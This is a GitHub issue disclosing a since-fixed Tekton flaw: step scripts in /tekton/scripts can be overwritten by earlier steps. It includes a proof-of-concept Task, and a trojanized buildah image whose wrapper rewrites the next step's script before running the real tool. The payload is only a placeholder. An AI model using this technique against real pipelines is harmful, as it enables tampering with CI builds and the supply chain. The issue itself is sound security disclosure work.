scripts shouldn't be writable after placement

[06kellyjac]

Expected Behavior

Expected the scripts to be uneditable after placement

read-only file system: /tekton/scripts

Actual Behavior

You can edit scripts from within steps. If this modification is done ahead of a step executing and results in the modified behaviour.

Steps to Reproduce the Problem

This was done using tekton deployed by the 0.22.0-1 edition of the operator

Apply and run the below task

---
apiVersion: tekton.dev/v1beta1
kind: Task
metadata:
  name: overwrite-step
spec:
  steps:
    - name: hello
      image: busybox
      script: |
        MYFILE="$(find /tekton/scripts -name 'script-1-*')"
        echo "#!/bin/sh
        echo notworld" > "$MYFILE"
        chmod +x "$MYFILE"
    - name: world
      image: busybox
      script: |
        echo world

This can also affect real tasks such as the buildah one in the catalog either by having a malicious base image or maybe by injecting code in through the unescaped params

Any task with 2+ script steps and a method of changing what is ran in the first script block.
It has to be done from a preceeding script block as the script workspace/volume is only mounted when required for scripts

Dockerfile

FROM quay.io/buildah/stable:v1.17.0
RUN mv /bin/buildah /bin/.buildah && yum install findutils -y
COPY ./entry-buildah /bin/buildah

./entry-buildah

#!/bin/bash
MYFILE="$(find /tekton/scripts -name 'script-1-*' 2>/dev/null)"
if [ "$MYFILE" != "" ]; then
  echo "#!/bin/sh
  echo something malicious like pushing the image elsewhere" > "$MYFILE"
  chmod +x "$MYFILE"
fi
exec -a "$0" "/bin/.buildah"  "$@"

Sample Pipeline

---
apiVersion: tekton.dev/v1beta1
kind: Pipeline
metadata:
  name: buildah-pipeline
spec:
  workspaces:
    - name: source
      description: The workspace containing the source code which is to be build, pushed and deployed
  tasks:
    - name: clone
      taskRef:
        name: git-clone
      workspaces:
        - name: output
          workspace: source
      params:
        - name: url
          value: https://github.com/kelseyhightower/nocode
    - name: buildah
      taskRef:
        name: buildah
      runAfter:
        - clone
      workspaces:
        - name: source
          workspace: source
      params:
        # Change to an image based on the Dockerfile above
        - name: BUILDER_IMAGE
          value: IMAGE
        # Change depending on your registry although the push shouldn't happen
        - name: IMAGE
          value: registry:12345/sample
        - name: TLSVERIFY
          value: "false"

Additional Info

Scripts in /tekton/scripts should by default be mounted readonly as they shouldn't be modified at runtime.
Filesystem permissions alone can't be relied upon for preventing them being modified as images can be root by default or maybe require root.
Some users may also want to set the initContainer writing the scripts to a non-root user, this can also happen creating tekton resources in an openshift project.

If there is a usecase for changing the behaviour of following steps the following step should change it's own behaviour in an expected way upon reading a change in a volume.

This was discovered during some of our threatmodeling & issue hunting at https://github.com/controlplaneio/

[06kellyjac]

Resolved by #4161